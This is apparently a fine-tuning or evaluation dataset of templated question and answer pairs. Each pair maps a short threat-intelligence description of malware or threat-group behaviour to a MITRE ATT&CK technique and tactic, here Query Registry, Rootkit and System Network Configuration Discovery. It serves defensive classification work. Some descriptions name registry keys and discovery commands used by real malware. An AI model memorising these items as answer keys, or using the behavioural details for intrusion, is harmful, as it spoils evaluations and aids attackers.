+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used the RegQueryValueExA function to retrieve proxy information in the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can use the RegEnumKeyW to iterate through Registry keys.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brave Prince gathers information about the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can check the Registry for specific keys.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK provides access to the Windows Registry, which can be used to gather information.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak checks the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings for proxy configurations information.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has searched the Image File Execution Options registry key for ""Debugger"" within every subkey.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon enumerates values in the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT contains watchdog functionality that periodically ensures HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load is set to point to its executable.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower has the ability to enumerate `Uninstall` registry values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to enumerate Registry keys, including KEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt\strDataDir to search for a bitcoin wallet.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can query HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security\AccessVBOM\ to determine if the security setting for restricting default programmatic access is enabled.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT can check the default browser by querying HKCR\http\shell\open\command.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can check the Registry for the presence of HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate to determine how long it has been installed on a host.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can query the Registry to determine if it has already been installed on the system.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis queries the Registry for keys and values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of enumerating Registry keys and values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DownPaper searches and reads the value of the Windows Update Registry Run key.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses the rem reg query command to obtain values from Registry keys.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT queries the Registry for specific keys for potential privilege escalation and proxy information. FELIXROOT has also used WMI to query the Windows Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can get user agent strings for the default browser from HKCU\Software\Classes\http\shell\open\command.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher queries Registry values as part of its anti-sandbox checks.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can check `Software\Microsoft\Windows\CurrentVersion\Internet Settings` to extract the `ProxyServer` string.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can open random files and Registry keys to obscure malware behavior from sandbox analysis.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon enumerates registry keys with the command regkeyenum and obtains information for the Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A variant of HOPLIGHT hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key SYSTEM\CurrentControlSet\Control\Lsa Name.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer has a data wiper component that enumerates keys in the Registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can enumerate Registry values, keys, and data.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can enumerate Registry keys.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke can query the Registry to check for the presence of HKCU\Software\KasperskyLab.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can query the Registry for keys added to execute COM hijacking.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can check for existing stratum cryptomining information in HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can enumerate Registry keys with all subkeys and values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can read data from the Registry including from `HKLM\Software\NFC\IPA` and
+`HKLM\Software\NFC\`.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo queries the registry to look for information about Terminal Services.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may query the Registry by running reg query on a victim.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can search the registry files of a compromised host.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has used shellcode which reads code stored in the registry keys \REGISTRY\SOFTWARE\Microsoft\DRM using the native Windows API as well as read HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces as part of its C2.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can enumerate and query for information contained within the Windows Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc gathers product names from the Registry key: HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName and the processor description from the Registry key HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY has the ability to retrieve information from the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uses the command reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can query the Registry to get random file extensions to append to encrypted files.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can access the HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver queries the Registry to determine the correct Startup path to use for persistence.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\MICROSOFT\Windows NT\ CurrentVersion | ProductName`.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` and `HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid from compromised hosts.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can search for the `HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System` Registry key to gather system information.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used `check_registry_keys` as part of its environmental checks.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can query `SOFTWARE\Microsoft\.NETFramework\policy\v2.0` for discovery.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon queries several Registry keys to identify hard disk partitions to overwrite.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has queried the registry for proxy server information.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster has the ability to query the Registry to detect a key specific to VMware.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has looked in the registry to find the default browser path.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet searches the Registry for indicators of security programs.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck enumerates Registry keys associated with event logs.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEARDROP checked that HKU\SOFTWARE\Microsoft\CTF existed before decoding its embedded payload.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can query the Registry on compromised hosts using RegQueryValueExA.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla can query the Registry for its configuration information.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can query the Registry, typically `HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds`, to find the key and path to decrypt and load its kernel driver and kernel driver loader.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used Reg to query the Registry for installed programs.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can use the Registry for code updates and to collect credentials.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer checks the system for certain Registry keys.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINDSHIELD can gather Registry values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker checks for specific registry keys related to the UCOMIEnumConnections and IActiveScriptParseProcedure32 interfaces.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can query the Registry key ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI"" to see if the value `OracleOcilib` exists.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can search registry keys to identify antivirus programs on an compromised host.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy executes the reg query command to obtain information in the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda checks for the existence of a Registry key and if it contains certain values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can query the netsvc group value data located in the svchost group Registry key.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ can search the registry of a compromised host.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can read specific registry values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 deployed rootkits on Linux systems.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti Group used a rootkit to modify typical server functionality.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER hooks or replaces multiple legitimate processes and other functions on victim devices.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has used user mode rootkit techniques to remain hidden on the system.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell has a module to use a rootkit on a system.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.","Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has used user mode rootkit techniques to remain hidden on the system.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HIDEDRV is a rootkit that hides certain operating system artifacts.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTRAN can install a rootkit to hide network connections from the host OS.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp uses a rootkit to hook and implement functions on the system.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit is a Rootkit that has been used by Axiom.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has modified /etc/ld.so.preload to overwrite readdir() and readdir64().,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy starts a rootkit from a malicious file dropped to disk.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has included a rootkit to evade defenses.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses a Windows rootkit to mask its binaries and other relevant files.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.","Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use its kernel module to prevent its host components from being listed by the targeted system's OS and to mediate requests between user mode and concealed components.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can include a rootkit to hide processes, files, and startup.","Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.","Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeroaccess is a kernel-mode rootkit.,"Tecnique: T1014 Rootkit, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors ran `nslookup` and Advanced IP Scanner on the target network.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used ipconfig for discovery on remote systems.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors discovered the local network configuration with `ipconfig`.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 used the ipconfig /all command to gather network configuration information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used the ipconfig /all command to gather the IP address from the system.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 collected MAC addresses from victim machines.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used ipconfig, Ping, and tracert to enumerate the IP address and network environment and settings of the local host.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has collected the IP address and network adapter information from the victim’s machine.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used the command ipconfig to obtain information about network configurations.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used `nslookup` and `ipconfig` for network reconnaissance efforts. FIN13 has also utilized a compromised Symantec Altiris console and LanDesk account to retrieve network information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used ipconfig /all to obtain information about the victim network configuration. The group also ran a modified version of NBTscan to identify available NetBIOS name servers.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has collected IP information via IPInfo.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used Ping and `tracert` for network discovery.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used ipconfig to gather network configuration information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has performed local network configuration discovery using ipconfig.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used `ipconfig/all` to gather network configuration information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has collected the domain name of a compromised network.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware to collect the victim’s IP address and domain name.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used ipconfig and arp to determine network configuration information.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon uses commands such as netsh interface show to discover network interface settings.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has run ipconfig /all on a victim.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has identified the IP address of a compromised host.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used malware to collect information on network interfaces, including the MAC address.","Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers the Address Resolution Protocol (ARP) table from the victim.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has enumerated the host machine’s IP address.,"Tecnique: T1016 System Network Configuration Discovery, Tactic: TA0007 Discovery"
